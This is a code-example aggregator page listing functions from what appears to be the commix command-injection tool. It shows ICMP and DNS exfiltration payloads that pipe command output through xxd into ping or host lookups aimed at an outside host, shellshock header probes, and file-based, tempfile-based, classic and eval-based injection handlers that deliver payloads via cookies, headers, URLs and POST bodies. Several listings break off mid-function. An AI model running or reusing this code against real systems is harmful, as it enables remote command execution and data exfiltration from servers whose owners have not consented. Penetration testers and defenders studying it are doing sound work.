

Python settings.print_payload函数代码示例

本文整理汇总了Python中src.utils.settings.print_payload函数的典型用法代码示例。如果您正苦于以下问题:Python print_payload函数的具体用法?Python print_payload怎么用?Python print_payload使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了print_payload函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: cmd_exec

def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
  """
  Send one command wrapped in the ICMP exfiltration payload to the target.

  The payload hex-dumps the command output with xxd and passes every chunk
  to `ping -p`, so the output travels in the pad bytes of echo requests
  addressed to ip_src. Nothing is returned; an HTTP error prints its status
  code and exits.

  Defender's note: on the wire this is a burst of same-sized echo requests
  whose pad pattern differs from packet to packet, started by the process
  that serves the web application.
  """
  global add_new_line
  # exfiltration_length is defined outside this function.
  chunk_size = exfiltration_length
  payload = ("; " + cmd + " | xxd -p -c" + str(chunk_size) + " | while read line; do ping -p $line -c1 -s" + str(chunk_size * 2) + " -q " + ip_src + "; done")

  # Echo the command and the payload only when verbosity is switched on.
  if settings.VERBOSITY_LEVEL >= 1:
    notice = "Executing the '" + cmd + "' command... "
    sys.stdout.write(settings.print_info_msg(notice))
    sys.stdout.flush()
    sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

  if http_request_method != "GET":
    post_body = urllib.urlencode({vuln_parameter: payload})
    req = urllib2.Request(url=url, data=post_body)
  else:
    # Only spaces are percent-encoded; the payload is appended to the end of the URL.
    req = url.replace(settings.INJECT_TAG, "") + payload.replace(" ", "%20")

  try:
    sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
    reply = urllib2.urlopen(req)
    time.sleep(3)
    sys.stdout.write(Style.RESET_ALL)
    if not add_new_line:
      print ""
    else:
      print "\n"
      # NOTE(review): the flag is already truthy on this path.
      add_new_line = True

  except urllib2.HTTPError, http_err:
    print settings.print_critical_msg(str(http_err.code))
    raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:35,代码来源:icmp_exfiltration.py

示例2: cmd_exec

def cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter):
  """
  Send one command wrapped in the DNS exfiltration payload to the target.

  The payload hex-dumps the command output 16 bytes per line and runs
  `host <chunk>.xxx <dns_server>` for every line, so the output leaves the
  target as the first label of lookups addressed to dns_server. Nothing is
  returned.

  Defender's note: look for the web application's process starting `host`,
  and for runs of lookups whose first label is a long hex string.

  NOTE(review): urllib2.urlopen is not inside a try block here, so a request
  error propagates to the caller.
  """
  payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do host $line.xxx " + dns_server + "; done")

  # Echo the payload only when verbosity is switched on.
  if settings.VERBOSITY_LEVEL >= 1:
    sys.stdout.write("\n" + settings.print_payload(payload))

  if http_request_method != "GET":
    post_body = urllib.urlencode({vuln_parameter: payload})
    req = urllib2.Request(url=url, data=post_body)
  else:
    # Only spaces are percent-encoded; the payload is appended to the end of the URL.
    req = url.replace(settings.INJECT_TAG, "") + payload.replace(" ", "%20")

  sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
  reply = urllib2.urlopen(req)
  # Fixed two-second pause after the request before the colours are reset.
  time.sleep(2)
  sys.stdout.write("\n" + Style.RESET_ALL)
开发者ID:aventado,项目名称:commix,代码行数:21,代码来源:dns_exfiltration.py

示例3: cmd_exec

def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
  """
  Send one command wrapped in the ICMP exfiltration payload to the target.

  The payload hex-dumps the command output 16 bytes per line and passes
  every line to `ping -p`, so the output travels in the pad bytes of single
  echo requests addressed to ip_src. Nothing is returned.

  Defender's note: on the wire this is a run of 16-byte echo requests whose
  pad pattern differs from packet to packet.

  NOTE(review): urllib2.urlopen is not inside a try block here, so a request
  error propagates to the caller.
  """
  payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do ping -p $line -c 1 -s16 -q " + ip_src + "; done")

  # Echo the payload only when the verbose option is set.
  if menu.options.verbose:
    sys.stdout.write("\n" + settings.print_payload(payload))

  if http_request_method != "GET":
    post_body = urllib.urlencode({vuln_parameter: payload})
    req = urllib2.Request(url=url, data=post_body)
  else:
    # Only spaces are percent-encoded; the payload is appended to the end of the URL.
    req = url.replace(settings.INJECT_TAG, "") + payload.replace(" ", "%20")

  sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
  reply = urllib2.urlopen(req)
  # Fixed two-second pause after the request before the colours are reset.
  time.sleep(2)
  sys.stdout.write("\n" + Style.RESET_ALL)
  print ""
开发者ID:ardiansn,项目名称:commix,代码行数:22,代码来源:icmp_exfiltration.py

示例4: check_for_shell

  def check_for_shell(url, cmd, cve, check_header, filename):
    """
    Send `cmd` through the shellshock payload in one header and return its output.

    The command is wrapped between two copies of a random six-letter marker
    so that its output can be cut out of the response body. Returns a
    (output, payload) tuple; a URLError prints a critical message and exits.

    NOTE(review): `filename` is not used in this function. As a side effect,
    menu.options.agent is set to the payload or to default_user_agent.
    """
    try:
      marker = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
      cmd = "echo " + marker + "$(" + cmd + ")" + marker
      payload = shellshock_exploitation(cve, cmd)

      level = settings.VERBOSITY_LEVEL
      if level == 1 or level > 1:
        sys.stdout.write(settings.print_info_msg("Executing the '" + cmd + "' command... "))
      sys.stdout.flush()
      if level >= 1:
        sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")

      # The payload is the value of exactly one request header.
      request = urllib2.Request(url, None, {check_header : payload})
      menu.options.agent = payload if check_header == "User-Agent" else default_user_agent
      log_http_headers.do_check(request)
      log_http_headers.check_http_traffic(request)

      # Route through the HTTP proxy, then Tor, then a direct connection.
      if menu.options.proxy:
        response = proxy.use_proxy(request)
      elif menu.options.tor:
        response = tor.use_tor(request)
      else:
        response = urllib2.urlopen(request)

      # Flatten the body to one line, then keep what sits between the markers.
      body = response.read().rstrip().replace('\n',' ')
      matches = re.findall(r"" + marker + "(.*)" + marker, body)
      return ''.join(matches), payload

    except urllib2.URLError, url_err:
      print "\n" + settings.print_critical_msg(url_err)
      raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:39,代码来源:shellshock.py

示例5: check_injection

  def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
    """
    Build the file-based command-execution payload for `cmd` and send it.

    The payload goes to the first injection point that matches: the cookie,
    User-Agent, Referer or Host option when it contains settings.INJECT_TAG,
    a custom header when settings.CUSTOM_HEADER_INJECTION is set, otherwise
    the GET URL or the POST body. Returns the response of that request.

    NOTE(review): the `payload` argument is overwritten before it is read,
    and `TAG` and `filename` are not used in this function.
    """
    
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE) 
    else:
      payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) 

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)

    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      payload_msg = payload.replace("\n", "\\n")
      # NOTE(review): this branch also truncates the payload that is sent, not
      # only the printed copy, so the request differs between verbose and
      # non-verbose runs. payload_msg itself is never printed.
      if settings.COMMENT in payload_msg:
        payload = payload.split(settings.COMMENT)[0].strip()
        payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
      info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
      sys.stdout.write(settings.print_info_msg(info_msg))
      sys.stdout.flush()
      output_payload = "\n" + settings.print_payload(payload)
      # NOTE(review): always true here, the enclosing block has the same condition.
      if settings.VERBOSITY_LEVEL >= 1:
        output_payload = output_payload + "\n" 
      sys.stdout.write(output_payload)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      response = user_agent_injection_test(url, vuln_parameter, payload)
      
    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      response = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)
        # Only spaces are percent-encoded before the tag is substituted.
        payload = payload.replace(" ","%20")
        target = url.replace(settings.INJECT_TAG, payload)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        # Check if defined extra headers.
        headers.do_check(request)        
        # Get the response of the request
        response = requests.get_request_response(request) 

      else :
        # Check if defined method is POST.
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        # Define the POST data  
        if settings.IS_JSON:
          # Escape double quotes so the payload can sit inside a JSON string.
          payload = payload.replace("\"", "\\\"")
          data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
          # NOTE(review): the bare except hides every parse failure; `data` then
          # stays a string and json.dumps below encodes it as one JSON string.
          try:
            data = json.loads(data, strict = False)
          except:
            pass
          request = urllib2.Request(url, json.dumps(data))
        else:
          if settings.IS_XML:
            data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))  
          else:
            data = parameter.replace(settings.INJECT_TAG, payload)
          request = urllib2.Request(url, data)
          
        # Check if defined extra headers.
        headers.do_check(request)        
          
        # Get the response of the request
        response = requests.get_request_response(request)
    return response
开发者ID:security-geeks,项目名称:commix,代码行数:94,代码来源:fb_injector.py

示例6: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
  """
  Drive the tempfile-based (semi-blind) detection loop.

  For every prefix / suffix / separator combination the handler either
  restores a stored injection point (settings.LOAD_SESSION) or builds a new
  decision payload and hands it to the injector that matches the active
  injection point, keeping the injector's result in `how_long`.

  The listing is cut short by the page it was copied from, so the rest of
  the loop and the return value are not visible here.
  """

  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  possibly_vulnerable = False
  false_positive_warning = False
  how_long_statistic = []
  export_injection_info = False
  how_long = 0
  injection_type = "semi-blind command injection"
  technique = "tempfile-based injection technique"

  # Check if defined "--maxlen" option.
  # NOTE(review): maxlen is bound only when the option is given; confirm that
  # the omitted part never reads it otherwise.
  if menu.options.maxlen:
    maxlen = settings.MAXLEN
    
  # Check if defined "--url-reload" option.
  # NOTE(review): the message is printed, but nothing visible here stops the run.
  if menu.options.url_reload == True:
    err_msg = "The '--url-reload' option is not available in " + technique + "!"
    print settings.print_critical_msg(err_msg)

  whitespace = checks.check_whitespaces()

  if settings.VERBOSITY_LEVEL >= 1:
    info_msg ="Testing the " + technique + "... "
    print settings.print_info_msg(info_msg)

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:

        if settings.LOAD_SESSION:
          cmd = shell = ""
          # Restore every field of the stored injection point in one unpack.
          url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
          checks.check_for_stored_tamper(payload)
          settings.FOUND_HOW_LONG = how_long
          settings.FOUND_DIFF = how_long - delay
          OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
          
        else:
          num_of_chars = num_of_chars + 1
          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive results.
          # NOTE(review): the generator's loop variable reuses the name num_of_chars.
          TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

          # The output file for file-based injection technique.
          OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
          alter_shell = menu.options.alter_shell
          # TAG has six letters here, so output_length runs from 1 to 9.
          tag_length = len(TAG) + 4
          
          for output_length in range(1, int(tag_length)):
            try:
              # Tempfile-based decision payload (check if host is vulnerable).
              if alter_shell :
                payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
              else:
                payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)
              
              # Encode payload to Base64
              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                # Escape newlines so the payload prints on a single line.
                payload_msg = payload.replace("\n", "\\n")
                print settings.print_payload(payload_msg)
                  
              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer injection.
#......... part of the code is omitted here .........
开发者ID:dtrip,项目名称:commix,代码行数:101,代码来源:tfb_handler.py

示例7: cb_injection_handler

def cb_injection_handler(url, timesec, filename, http_request_method):
  """
  Drive the classic (results-based) command injection detection loop.

  For every whitespace / prefix / suffix / separator combination the handler
  either restores a stored injection point or builds a new decision payload
  from a random tag and two random numbers, then sends it through the
  injector that matches the active injection point.

  The listing is cut short by the page it was copied from, so the response
  check and the return value are not visible here.
  """
  shell = False
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  injection_type = "results-based OS command injection"
  technique = "classic command injection technique"

  if not settings.LOAD_SESSION: 
    info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
      
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          # A literal space is percent-encoded once; later inner iterations
          # see the encoded value and skip this branch.
          if whitespace == " ":
            whitespace = urllib.quote(whitespace) 
          # Check injection state
          settings.DETECTION_PHASE = True
          settings.EXPLOITATION_PHASE = False
          # If a previous session is available.
          if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type):
            try:
              settings.CLASSIC_STATE = True
              # Restore every field of the stored injection point in one unpack.
              url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
              checks.check_for_stored_tamper(payload)
            # A TypeError from the unpack is reported as a broken session file.
            except TypeError:
              err_msg = "An error occurred while accessing session file ('"
              err_msg += settings.SESSION_FILE + "'). "
              err_msg += "Use the '--flush-session' option."
              print settings.print_critical_msg(err_msg)
              raise SystemExit()

          else:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
            
            # Two random operands are passed to the decision payload; their sum
            # is kept in randvcalc (its use is in the omitted part).
            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2
            
            # Define alter shell
            alter_shell = menu.options.alter_shell
            
            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = cb_payloads.decision(separator, TAG, randv1, randv2)
              
              # Define prefixes & suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = payload.replace(" ", whitespace)
              
              # Perform payload modification
              payload = checks.perform_payload_modification(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL == 1:
                print settings.print_payload(payload)
              elif settings.VERBOSITY_LEVEL > 1:
                info_msg = "Generating a payload for injection..."
                print settings.print_info_msg(info_msg)
                print settings.print_payload(payload) 
                
              # Cookie header injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie header injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent HTTP header injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent HTTP header injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer HTTP header injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer HTTP header injection.
#......... part of the code is omitted here .........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:cb_handler.py

示例8: check_injection

  def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
    """
    Build the eval-based command-execution payload for `cmd` and send it.

    The payload goes to the first injection point that matches: the cookie,
    User-Agent or Referer option when it contains settings.INJECT_TAG, a
    custom header when settings.CUSTOM_HEADER_INJECTION is set, otherwise the
    GET URL or the POST body. Returns the response of that request.

    NOTE(review): `filename` is not used in this function.
    """
    # Execute shell commands on vulnerable host.
    if alter_shell:
      payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
      payload = eb_payloads.cmd_execution(separator, TAG, cmd)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    # Fixation for specific payload.
    # Drops the encoded ';' (%3B) that sits right before the encoded ')}'.
    if ")%3B" + urllib.quote(")}") in payload:
      payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
      from src.core.tamper import base64encode
      payload = base64encode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      info_msg = "Executing the '" + cmd + "' command: "
      sys.stdout.write("\n" + settings.print_info_msg(info_msg))
      sys.stdout.flush()
      sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      response = cookie_injection_test(url, vuln_parameter, payload)

     # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)
        
        # NOTE(review): re.sub reads its second argument as a replacement
        # template, so backslash sequences in it are interpreted; a plain
        # str.replace would substitute the text literally.
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        
        # Check if defined extra headers.
        headers.do_check(request)  

        # Get the response of the request
        response = requests.get_request_response(request)
       
      else :
        # Check if defined method is POST.
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        # Re-encode '+' so that it is not read as a space in the form body.
        parameter = parameter.replace("+","%2B")
        
        # Define the POST data   
        if settings.IS_JSON == False:
          data = re.sub(settings.INJECT_TAG, payload, parameter)
          request = urllib2.Request(url, data)
        else:
          # Escape double quotes so the payload can sit inside a JSON string.
          payload = payload.replace("\"", "\\\"")
          data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
          # NOTE(review): json.loads is not guarded here, so data that does not
          # parse raises to the caller.
          data = json.loads(data, strict = False)
          request = urllib2.Request(url, json.dumps(data))
        
        # Check if defined extra headers.
        headers.do_check(request)

        # Get the response of the request
        response = requests.get_request_response(request)

    return response
开发者ID:BMaChina,项目名称:commix,代码行数:86,代码来源:eb_injector.py

示例9: shellshock_handler

def shellshock_handler(url, http_request_method, filename):
  """
  Probe `url` with one request per (CVE, header) pair and report a hit.

  Each probe carries the payload as the value of a single request header
  (check_header). A pair counts as a hit when the CVE identifier is found in
  response.info(); the handler then prints the finding and offers the
  enumeration and file-access steps.

  Defender's note: every probe is an ordinary request with one unusual
  header value, so logging request header values on the server side is what
  exposes this scan.

  The listing is cut short by the page it was copied from; the end of the
  function, including the handler of the `try` below, is not visible here.
  """

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  info_msg = "Testing the " + technique + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()

  try: 
    i = 0
    # shellshock_cves and headers are defined outside this function; headers
    # is iterated as a collection of header names.
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + settings.print_payload(payload))

        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        response = urllib2.urlopen(request)

        if not menu.options.verbose:
          # NOTE(review): this integer value is always replaced by one of the
          # branches below.
          percent = ((i*100)/total)
          float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
          
          if str(float_percent) == "100.0":
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          # Membership test on the response headers object; presumably a
          # lookup by header name - confirm against the payload builder.
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(float_percent )+ "%"

          info_msg = "Testing the " + technique + "... " +  "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()

          # Print the findings to log file.
          # NOTE(review): these log calls sit inside the non-verbose branch, so
          # nothing is logged in verbose mode, and they run for every probe,
          # not only for hits. `counter` is not incremented in the visible part.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          if vp_flag == True:
            vuln_parameter = "HTTP Header"
            vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
          logs.update_payload(filename, counter, payload) 

        if cve in response.info():
          no_result = False
          success_msg = "The (" + check_header + ") '" + Style.UNDERLINE 
          success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
          print "\n" + settings.print_success_msg(success_msg)
          print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          if not menu.options.verbose:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            if menu.options.verbose:
              print ""
            # Ask until the answer is one of the yes / no / quit choices.
            while True:
              question_msg = "Do you want to enumerate again? [Y/n/q] > "
              enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO: 
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                # An empty answer is shown as "enter" in the error message.
                if enumerate_again == "":
                  enumerate_again = "enter"
                err_msg = "'" + enumerate_again + "' is not a valid answer."  
                print settings.print_error_msg(err_msg) + "\n"
                pass
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              question_msg = "Do you want to access files again? [Y/n/q] > "
              file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO: 
                break
#......... part of the code is omitted here .........
开发者ID:ardiansn,项目名称:commix,代码行数:101,代码来源:shellshock.py

示例10: check_for_shell

      header = { check_header : payload }
      request = urllib2.Request(url, None, header)
      response = urllib2.urlopen(request)
      shell = response.read().rstrip()
      return shell, payload

    except urllib2.URLError, err_msg:
      print "\n" + settings.print_error_msg(err_msg)
      sys.exit(0)

  shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
  if len(shell) == 0:
    cmd = "/bin/" + cmd
    shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
    if menu.options.verbose and len(shell) > 0:
      sys.stdout.write("\n" + settings.print_payload(payload))
    if len(shell) == 0:
      cmd = "/usr" + cmd
      shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
      if menu.options.verbose and len(shell) > 0:
        sys.stdout.write("\n" + settings.print_payload(payload))

  return shell, payload

"""
The exploitation function.
(call the injection handler)
"""
def exploitation(url, http_request_method, filename):
  """
  Run the shellshock injection handler for `url`.

  Returns False when the handler's result compares equal to False; in every
  other case the function falls through and returns None.
  """
  handler_result = shellshock_handler(url, http_request_method, filename)
  if handler_result == False:
    return False
开发者ID:ardiansn,项目名称:commix,代码行数:31,代码来源:shellshock.py

示例11: fb_injection_handler

def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response):
  """
  Drive the file-based (semi-blind) command injection detection loop.

  For every whitespace / prefix / suffix / separator combination the handler
  either restores a stored injection point or builds a decision payload that
  names an output file `<TAG>.txt`, then sends it through the injector that
  matches the active injection point.

  Defender's note: the output file is named after six random uppercase
  letters plus ".txt", and the progress message refers to settings.WEB_ROOT
  as its location, so unexpected files of that shape there are a trace of
  this technique.

  The listing is cut short by the page it was copied from, so the response
  check and the return value are not visible here.
  """
  shell = False
  counter = 1
  vp_flag = True
  exit_loops = False
  no_result = True
  is_encoded = False
  stop_injection = False
  call_tmp_based = False
  next_attack_vector = False
  export_injection_info = False
  injection_type = "semi-blind command injection"
  technique = "file-based command injection technique"

  tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response)

  # TAG is bound here only for a fresh run or a retest; with a loaded session
  # it comes from the stored injection point inside the loop.
  if not settings.LOAD_SESSION or settings.RETEST == True: 
    TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
    info_msg = "Trying to create a file in '" + settings.WEB_ROOT 
    info_msg += "' for command execution results... "
    print settings.print_info_msg(info_msg)

  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  # Check if defined alter shell
  alter_shell = menu.options.alter_shell
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:

          # Check injection state
          settings.DETECTION_PHASE = True
          settings.EXPLOITATION_PHASE = False
          # If a previous session is available.
          if settings.LOAD_SESSION:
            try:
              settings.FILE_BASED_STATE = True
              # Restore every field of the stored injection point in one unpack.
              url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
              checks.check_for_stored_tamper(payload)
              OUTPUT_TEXTFILE = TAG + ".txt"
              session_handler.notification(url, technique, injection_type)
              # A stored tempfile-based injection point is handed to that handler.
              if technique == "tempfile-based injection technique":
                #settings.LOAD_SESSION = True
                tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response)
            # A TypeError from the unpack is reported as a broken session file.
            except TypeError:
              err_msg = "An error occurred while accessing session file ('"
              err_msg += settings.SESSION_FILE + "'). "
              err_msg += "Use the '--flush-session' option."
              print settings.print_critical_msg(err_msg)
              raise SystemExit()

          # A pending retest is cleared and run through the classic handler first.
          if settings.RETEST == True:
            settings.RETEST = False
            from src.core.injections.results_based.techniques.classic import cb_handler
            cb_handler.exploitation(url, timesec, filename, http_request_method)
   
